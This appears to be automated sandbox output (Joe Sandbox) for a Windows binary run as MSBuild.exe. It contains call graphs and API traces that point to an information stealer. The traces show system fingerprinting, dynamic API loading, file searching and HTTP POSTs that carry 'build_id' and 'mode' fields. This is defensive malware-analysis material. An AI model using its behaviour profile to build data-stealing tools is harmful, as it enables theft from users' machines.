lstrcpy 53866->53867 53868 414858 53867->53868 53869 40fa9c 4 API calls 53868->53869 53870 414875 53869->53870 53871 40f9e1 lstrcpy 53870->53871 53872 414882 53871->53872 53873 4104dd 13 API calls 53872->53873 53874 414897 53873->53874 53875 40fa28 3 API calls 53874->53875 53876 4148a9 53875->53876 53877 40f9e1 lstrcpy 53876->53877 53878 4148b6 53877->53878 53879 40fa9c 4 API calls 53878->53879 53880 4148df 53879->53880 53881 40f9e1 lstrcpy 53880->53881 53882 4148ec 53881->53882 53883 40fa9c 4 API calls 53882->53883 53884 414909 53883->53884 
53885 40f9e1 lstrcpy 53884->53885 53886 414916 53885->53886 53887 414922 GetCurrentProcessId 53886->53887 54535 411001 OpenProcess 53887->54535 53890 40fa28 3 API calls 53891 414945 53890->53891 53892 40f9e1 lstrcpy 53891->53892 53893 414952 53892->53893 53894 40fa9c 4 API calls 53893->53894 53895 41497b 53894->53895 53896 40f9e1 lstrcpy 53895->53896 53897 414988 53896->53897 53898 40fa9c 4 API calls 53897->53898 53899 4149a5 53898->53899 53900 40f9e1 lstrcpy 53899->53900 53901 4149b2 53900->53901 53902 40fa9c 4 API calls 53901->53902 53903 4149cf 53902->53903 53904 40f9e1 lstrcpy 53903->53904 53905 4149dc 53904->53905 53906 40fa9c 4 API calls 53905->53906 53907 4149f9 53906->53907 53908 40f9e1 lstrcpy 53907->53908 53909 414a06 53908->53909 54540 41064b GetProcessHeap HeapAlloc 53909->54540 53912 40fa9c 4 API calls 53913 414a24 53912->53913 53914 40f9e1 lstrcpy 53913->53914 53915 414a31 53914->53915 53916 40fa9c 4 API calls 53915->53916 53917 414a4e 53916->53917 53918 40f9e1 lstrcpy 53917->53918 53919 414a5b 53918->53919 53920 40fa9c 4 API calls 53919->53920 53921 414a78 53920->53921 53922 40f9e1 lstrcpy 53921->53922 53923 414a85 53922->53923 54547 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 53923->54547 53926 40fa28 3 API calls 53927 414aac 53926->53927 53928 40f9e1 lstrcpy 53927->53928 53929 414ab9 53928->53929 53930 40fa9c 4 API calls 53929->53930 53931 414ae2 53930->53931 53932 40f9e1 lstrcpy 53931->53932 53933 414aef 53932->53933 53934 40fa9c 4 API calls 53933->53934 53935 414b0c 53934->53935 53936 40f9e1 lstrcpy 53935->53936 53937 414b19 53936->53937 54560 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 53937->54560 53940 40fa28 3 API calls 53941 414b40 53940->53941 53942 40f9e1 lstrcpy 53941->53942 53943 414b4d 53942->53943 53944 40fa9c 4 API calls 53943->53944 53945 414b76 53944->53945 53946 40f9e1 lstrcpy 53945->53946 53947 414b83 53946->53947 53948 40fa9c 4 API calls 53947->53948 53949 414ba0 53948->53949 
53950 40f9e1 lstrcpy 53949->53950 53951 414bad 53950->53951 54573 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 53951->54573 53954 40fa9c 4 API calls 53955 414bcb 53954->53955 53956 40f9e1 lstrcpy 53955->53956 53957 414bd8 53956->53957 53958 40fa9c 4 API calls 53957->53958 53959 414bf5 53958->53959 53960 40f9e1 lstrcpy 53959->53960 53961 414c02 53960->53961 53962 40fa9c 4 API calls 53961->53962 53963 414c1f 53962->53963 53964 40f9e1 lstrcpy 53963->53964 53965 414c2c 53964->53965 54575 40fbcb GetProcessHeap HeapAlloc GetUserNameA 53965->54575 53967 414c3d 53968 40fa9c 4 API calls 53967->53968 53969 414c4a 53968->53969 53970 40f9e1 lstrcpy 53969->53970 53971 414c57 53970->53971 53972 40fa9c 4 API calls 53971->53972 53973 414c74 53972->53973 53974 40f9e1 lstrcpy 53973->53974 53975 414c81 53974->53975 53976 40fa9c 4 API calls 53975->53976 53977 414c9e 53976->53977 53978 40f9e1 lstrcpy 53977->53978 53979 414cab 53978->53979 54576 4103a0 7 API calls 53979->54576 53982 40fa28 3 API calls 53983 414cd2 53982->53983 53984 40f9e1 lstrcpy 53983->53984 53985 414cdf 53984->53985 53986 40fa9c 4 API calls 53985->53986 53987 414d08 53986->53987 53988 40f9e1 lstrcpy 53987->53988 53989 414d15 53988->53989 53990 40fa9c 4 API calls 53989->53990 53991 414d32 53990->53991 53992 40f9e1 lstrcpy 53991->53992 53993 414d3f 53992->53993 54579 40fce5 _EH_prolog 53993->54579 53996 40fa28 3 API calls 53997 414d69 53996->53997 53998 40f9e1 lstrcpy 53997->53998 53999 414d76 53998->53999 54000 40fa9c 4 API calls 53999->54000 54001 414da5 54000->54001 54002 40f9e1 lstrcpy 54001->54002 54003 414db2 54002->54003 54004 40fa9c 4 API calls 54003->54004 54005 414dd5 54004->54005 54006 40f9e1 lstrcpy 54005->54006 54007 414de2 54006->54007 54589 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 54007->54589 54009 414df6 54010 40fa9c 4 API calls 54009->54010 54011 414e06 54010->54011 54012 40f9e1 lstrcpy 54011->54012 54013 414e13 54012->54013 54014 40fa9c 4 API calls 54013->54014 54015 414e36 
54014->54015 54016 40f9e1 lstrcpy 54015->54016 54017 414e43 54016->54017 54018 40fa9c 4 API calls 54017->54018 54019 414e63 54018->54019 54020 40f9e1 lstrcpy 54019->54020 54021 414e70 54020->54021 54590 40fc92 GetProcessHeap HeapAlloc GetTimeZoneInformation 54021->54590 54024 40fa9c 4 API calls 54025 414e8e 54024->54025 54026 40f9e1 lstrcpy 54025->54026 54027 414e9b 54026->54027 54028 40fa9c 4 API calls 54027->54028 54029 414ebb 54028->54029 54030 40f9e1 lstrcpy 54029->54030 54031 414ec8 54030->54031 54032 40fa9c 4 API calls 54031->54032 54033 414eeb 54032->54033 54034 40f9e1 lstrcpy 54033->54034 54035 414ef8 54034->54035 54036 40fa9c 4 API calls 54035->54036 54037 414f1b 54036->54037 54038 40f9e1 lstrcpy 54037->54038 54039 414f28 54038->54039 54593 40fe18 GetProcessHeap HeapAlloc RegOpenKeyExA 54039->54593 54041 414f3c 54042 40fa9c 4 API calls 54041->54042 54043 414f4c 54042->54043 54044 40f9e1 lstrcpy 54043->54044 54045 414f59 54044->54045 54046 40fa9c 4 API calls 54045->54046 54047 414f7c 54046->54047 54048 40f9e1 lstrcpy 54047->54048 54049 414f89 54048->54049 54050 40fa9c 4 API calls 54049->54050 54051 414fa9 54050->54051 54052 40f9e1 lstrcpy 54051->54052 54053 414fb6 54052->54053 54596 40feb4 54053->54596 54056 40fa9c 4 API calls 54057 414fd4 54056->54057 54058 40f9e1 lstrcpy 54057->54058 54059 414fe1 54058->54059 54060 40fa9c 4 API calls 54059->54060 54061 415001 54060->54061 54062 40f9e1 lstrcpy 54061->54062 54063 41500e 54062->54063 54064 40fa9c 4 API calls 54063->54064 54065 41502e 54064->54065 54066 40f9e1 lstrcpy 54065->54066 54067 41503b 54066->54067 54611 40fe81 GetSystemInfo wsprintfA 54067->54611 54069 41504c 54070 40fa9c 4 API calls 54069->54070 54071 415059 54070->54071 54072 40f9e1 lstrcpy 54071->54072 54073 415066 54072->54073 54074 40fa9c 4 API calls 54073->54074 54075 415086 54074->54075 54076 40f9e1 lstrcpy 54075->54076 54077 415093 54076->54077 54078 40fa9c 4 API calls 54077->54078 54079 4150b3 54078->54079 54080 40f9e1 lstrcpy 54079->54080 
54081 4150c0 54080->54081 54612 40ff81 GetProcessHeap HeapAlloc 54081->54612 54083 4150d1 54084 40fa9c 4 API calls 54083->54084 54085 4150de 54084->54085 54086 40f9e1 lstrcpy 54085->54086 54087 4150eb 54086->54087 54088 40fa9c 4 API calls 54087->54088 54089 41510b 54088->54089 54090 40f9e1 lstrcpy 54089->54090 54091 415118 54090->54091 54092 40fa9c 4 API calls 54091->54092 54093 41513b 54092->54093 54094 40f9e1 lstrcpy 54093->54094 54095 415148 54094->54095 54617 40ffea _EH_prolog 54095->54617 54098 40fa28 3 API calls 54099 415178 54098->54099 54100 40f9e1 lstrcpy 54099->54100 54101 415185 54100->54101 54102 40fa9c 4 API calls 54101->54102 54103 4151b7 54102->54103 54104 40f9e1 lstrcpy 54103->54104 54105 4151c4 54104->54105 54106 40fa9c 4 API calls 54105->54106 54107 4151e7 54106->54107 54108 40f9e1 lstrcpy 54107->54108 54109 4151f4 54108->54109 54623 4102c3 _EH_prolog 54109->54623 54111 41520f 54112 40fa28 3 API calls 54111->54112 54113 415224 54112->54113 54114 40f9e1 lstrcpy 54113->54114 54115 415231 54114->54115 54116 40fa9c 4 API calls 54115->54116 54117 415263 54116->54117 54118 40f9e1 lstrcpy 54117->54118 54119 415270 54118->54119 54120 40fa9c 4 API calls 54119->54120 54121 415293 54120->54121 54122 40f9e1 lstrcpy 54121->54122 54123 4152a0 54122->54123 54631 410071 _EH_prolog 54123->54631 54125 4152bd 54126 40fa28 3 API calls 54125->54126 54127 4152d3 54126->54127 54128 40f9e1 lstrcpy 54127->54128 54129 4152e0 54128->54129 54130 410071 18 API calls 54129->54130 54131 41530c 54130->54131 54132 40fa28 3 API calls 54131->54132 54133 41531f 54132->54133 54134 40f9e1 lstrcpy 54133->54134 54135 41532c 54134->54135 54136 40fa9c 4 API calls 54135->54136 54137 415358 54136->54137 54138 40f9e1 lstrcpy 54137->54138 54139 415365 54138->54139 54140 415379 lstrlenA 54139->54140 54141 415389 54140->54141 54142 40f923 lstrcpy 54141->54142 54143 41539f 54142->54143 54144 4010b1 2 API calls 54143->54144 54145 4153b7 54144->54145 54650 414437 _EH_prolog 54145->54650 54147 
4153c4 54148 401061 _EH_prolog 54147->54148 54149 4153ea 54148->54149 54149->52578 54151 40f95a lstrcpy 54150->54151 54152 4041dd 54151->54152 54153 403a54 6 API calls 54152->54153 54154 4041e9 GetProcessHeap RtlAllocateHeap 54153->54154 54921 40fb4d 54154->54921 54156 404223 InternetOpenA StrCmpCA 54157 404242 54156->54157 54158 404378 InternetCloseHandle 54157->54158 54159 40424d InternetConnectA 54157->54159 54162 4042e9 54158->54162 54160 40426d HttpOpenRequestA 54159->54160 54161 40436f InternetCloseHandle 54159->54161 54163 4042a2 54160->54163 54164 404368 InternetCloseHandle 54160->54164 54161->54158 54162->52583 54165 4042a6 InternetSetOptionA 54163->54165 54166 4042bc HttpSendRequestA HttpQueryInfoA 54163->54166 54164->54161 54165->54166 54166->54162 54168 40430c 54166->54168 54167 404326 InternetReadFile 54167->54164 54167->54168 54168->54162 54168->54164 54168->54167 54922 4060db 54169->54922 54171 40ef5b 54172 4010b1 2 API calls 54171->54172 54173 40ef6c 54172->54173 55161 40e7b8 9 API calls 54173->55161 54175 40ed50 StrCmpCA 54202 40ed28 54175->54202 54177 4010b1 2 API calls 54179 40ef7f 54177->54179 54178 40edc4 StrCmpCA 54178->54202 55208 40bbe8 _EH_prolog 54179->55208 54181 40f923 lstrcpy 54181->54202 54182 40eee0 StrCmpCA 54182->54202 54185 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 54185->54202 54187 4010b1 _EH_prolog lstrcpy 54187->54202 54189 40fa28 3 API calls 54189->54202 54192 40f9e1 lstrcpy 54192->54202 54200 40f95a lstrcpy 54200->54202 54202->54171 54202->54175 54202->54178 54202->54181 54202->54182 54202->54185 54202->54187 54202->54189 54202->54192 54202->54200 54925 40d3fa _EH_prolog 54202->54925 54979 40d6bb _EH_prolog 54202->54979 55091 40b8af _EH_prolog 54202->55091 54476 40f923 lstrcpy 54475->54476 54477 402128 54476->54477 54477->53383 54479 401081 54478->54479 54479->53405 54480->53383 54481->53383 54482->53383 54483->53383 54484->53396 54485->53399 54486->53388 54487->53378 54488->53399 54489->53363 54490->53399 54491->53347 
54492->53399 54494 40f923 lstrcpy 54493->54494 54495 402142 54494->54495 54495->53338 54496->53348 54497->53388 54499 4104c0 54498->54499 54500 40f923 lstrcpy 54499->54500 54501 4104d0 54500->54501 54501->53435 54502->53440 54504 403a6d 54503->54504 54504->54504 54505 403a74 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 54504->54505 54514 40fb4d 54505->54514 54507 403ab6 lstrlenA 54515 40fb4d 54507->54515 54509 403ac6 InternetCrackUrlA 54510 403ae4 54509->54510 54510->53449 54511->53574 54513 40f995 54512->54513 54513->53498 54514->54507 54515->54509 54516->53583 54517->53762 54518->53764 54519->53766 54520->53768 54521->53772 54522->53774 54524 40626c LocalAlloc 54523->54524 54525 4058f9 54523->54525 54524->54525 54526 40627c CryptStringToBinaryA 54524->54526 54525->53627 54525->53638 54526->54525 54527 406293 LocalFree 54526->54527 54527->54525 54528->53782 54529->53790 54530->53801 54531->53832 54533 410461 RegQueryValueExA 54532->54533 54534 41047c RegCloseKey CharToOemA 54532->54534 54533->54534 54534->53846 54536 411041 54535->54536 54537 411025 K32GetModuleFileNameExA CloseHandle 54535->54537 54538 40f923 lstrcpy 54536->54538 54537->54536 54539 411050 54538->54539 54539->53890 54669 40fbbd 54540->54669 54543 41067e RegOpenKeyExA 54545 4106b6 RegCloseKey 54543->54545 54546 41069e RegQueryValueExA 54543->54546 54544 410677 54544->53912 54545->54544 54546->54545 54548 4107e5 54547->54548 54549 4108ea 54548->54549 54550 4107ed CoSetProxyBlanket 54548->54550 54551 40f923 lstrcpy 54549->54551 54552 41081d 54550->54552 54553 4108fb 54551->54553 54552->54549 54554 410851 VariantInit 54552->54554 54553->53926 54555 410874 54554->54555 54676 4106c4 _EH_prolog CoCreateInstance 54555->54676 54557 410882 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 54558 40f923 lstrcpy 54557->54558 54559 4108de VariantClear 54558->54559 54559->54553 54561 41098e 54560->54561 54562 410996 CoSetProxyBlanket 54561->54562 54565 410a33 54561->54565 54566 4109c6 54562->54566 54563 40f923 

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
                                                                                          • GetProcAddress.KERNEL32 ref: 00417670
                                                                                          • GetProcAddress.KERNEL32 ref: 00417687
                                                                                          • GetProcAddress.KERNEL32 ref: 0041769E
                                                                                          • GetProcAddress.KERNEL32 ref: 004176B5
                                                                                          • GetProcAddress.KERNEL32 ref: 004176CC
                                                                                          • GetProcAddress.KERNEL32 ref: 004176E3
                                                                                          • GetProcAddress.KERNEL32 ref: 004176FA
                                                                                          • GetProcAddress.KERNEL32 ref: 00417711
                                                                                          • GetProcAddress.KERNEL32 ref: 00417728
                                                                                          • GetProcAddress.KERNEL32 ref: 0041773F
                                                                                          • GetProcAddress.KERNEL32 ref: 00417756
                                                                                          • GetProcAddress.KERNEL32 ref: 0041776D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417784
                                                                                          • GetProcAddress.KERNEL32 ref: 0041779B
                                                                                          • GetProcAddress.KERNEL32 ref: 004177B2
                                                                                          • GetProcAddress.KERNEL32 ref: 004177C9
                                                                                          • GetProcAddress.KERNEL32 ref: 004177E0
                                                                                          • GetProcAddress.KERNEL32 ref: 004177F7
                                                                                          • GetProcAddress.KERNEL32 ref: 0041780E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417825
                                                                                          • GetProcAddress.KERNEL32 ref: 0041783C
                                                                                          • GetProcAddress.KERNEL32 ref: 00417853
                                                                                          • GetProcAddress.KERNEL32 ref: 0041786A
                                                                                          • GetProcAddress.KERNEL32 ref: 00417881
                                                                                          • GetProcAddress.KERNEL32 ref: 00417898
                                                                                          • GetProcAddress.KERNEL32 ref: 004178AF
                                                                                          • GetProcAddress.KERNEL32 ref: 004178C6
                                                                                          • GetProcAddress.KERNEL32 ref: 004178DD
                                                                                          • GetProcAddress.KERNEL32 ref: 004178F4
                                                                                          • GetProcAddress.KERNEL32 ref: 0041790B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417922
                                                                                          • GetProcAddress.KERNEL32 ref: 00417939
                                                                                          • GetProcAddress.KERNEL32 ref: 00417950
                                                                                          • GetProcAddress.KERNEL32 ref: 00417967
                                                                                          • GetProcAddress.KERNEL32 ref: 0041797E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417995
                                                                                          • GetProcAddress.KERNEL32 ref: 004179AC
                                                                                          • GetProcAddress.KERNEL32 ref: 004179C3
                                                                                          • GetProcAddress.KERNEL32 ref: 004179DA
                                                                                          • GetProcAddress.KERNEL32 ref: 004179F1
                                                                                          • GetProcAddress.KERNEL32 ref: 00417A08
                                                                                          • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                                          • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                                          • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                                          • GetProcAddress.KERNEL32(75290000), ref: 00417AD2
                                                                                          • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B00
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B17
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                                          • GetProcAddress.KERNEL32(734C0000), ref: 00417B4D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B64
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B92
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                                          • GetProcAddress.KERNEL32(752C0000), ref: 00417C09
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C20
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C37
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C65
                                                                                          • GetProcAddress.KERNEL32(74EC0000), ref: 00417C84
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                                          • GetProcAddress.KERNEL32(75BD0000), ref: 00417D16
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D44
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D72
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D89
                                                                                          • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                                          • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                                          • GetProcAddress.KERNEL32(75A70000), ref: 00417DE9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E00
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E17
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E45
                                                                                          • GetProcAddress.KERNEL32(75450000), ref: 00417E60
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E77
                                                                                          • GetProcAddress.KERNEL32(75DA0000), ref: 00417E92
                                                                                          • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                                          • GetProcAddress.KERNEL32(6F090000), ref: 00417EC8
                                                                                          • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                                          • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F24
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F52
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F69
                                                                                          • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                                          • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                                          • GetProcAddress.KERNEL32(75AF0000), ref: 00417FB0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                                          • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                                          • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                          • GetProcAddress.KERNEL32(75D90000), ref: 00418010
                                                                                          • GetProcAddress.KERNEL32(6E3F0000), ref: 0041802B
                                                                                          • GetProcAddress.KERNEL32 ref: 00418042
                                                                                          • GetProcAddress.KERNEL32 ref: 00418059
                                                                                          • GetProcAddress.KERNEL32 ref: 00418070
                                                                                          • GetProcAddress.KERNEL32(6CE40000,SymMatchString), ref: 0041808A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                          • API String ID: 2238633743-951535364
                                                                                          • Opcode ID: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                          • Instruction ID: 5d64eb95f993e10cfffcd180ca7930ca50f89af3c14b7aa20224d1cce3759a27
                                                                                          • Opcode Fuzzy Hash: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                          • Instruction Fuzzy Hash: 0042D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00405151
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                            • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                            • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425AC8,00000000), ref: 004057CC
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                          • memcpy.MSVCRT ref: 00405810
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                          • memcpy.MSVCRT ref: 00405843
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                          • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                          • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                          • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                          • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                          • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                          • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                          • API String ID: 2237346945-1447386369
                                                                                          • Opcode ID: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                          • Instruction ID: d7c5970f0897ada52bebf96924e878e3ecce30d18c8aa08c600bdb313c44272c
                                                                                          • Opcode Fuzzy Hash: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                          • Instruction Fuzzy Hash: 51424EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DA781B4CCB65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004153FB
                                                                                          • wsprintfA.USER32 ref: 00415421
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                          • memset.MSVCRT ref: 0041544F
                                                                                          • memset.MSVCRT ref: 0041545D
                                                                                          • StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                                          • StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                                          • wsprintfA.USER32 ref: 004154B9
                                                                                          • StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                                          • wsprintfA.USER32 ref: 004154F0
                                                                                          • wsprintfA.USER32 ref: 00415504
                                                                                          • memset.MSVCRT ref: 00415516
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                          • strtok_s.MSVCRT ref: 00415561
                                                                                          • memset.MSVCRT ref: 00415576
                                                                                          • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                          • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
